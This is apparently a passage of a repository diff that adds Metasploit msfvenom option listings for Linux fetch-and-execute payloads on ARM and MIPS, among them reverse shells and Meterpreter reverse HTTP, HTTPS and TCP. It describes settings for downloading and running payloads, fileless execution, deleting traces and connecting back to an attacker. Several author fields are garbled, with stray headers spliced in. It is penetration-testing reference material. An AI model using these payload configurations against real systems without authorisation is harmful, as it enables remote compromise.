CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt
+82
View File
@@ -0,0 +1,82 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/armle/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
civ
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EzSqYGrB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME jkofOBXy no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME nqGcBdJTD no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME qPigzETmWu no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt
+69
View File
@@ -0,0 +1,69 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/mipsbe/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
entropy <entropy@phiral.net>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME liEefdOwA no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
A very small shellcode for executing commands.
This module is sometimes helpful for testing purposes.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt
+100
View File
@@ -0,0 +1,100 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Norm
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp:
=========================
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EjqTwHWHT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME OJApyhagJby no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
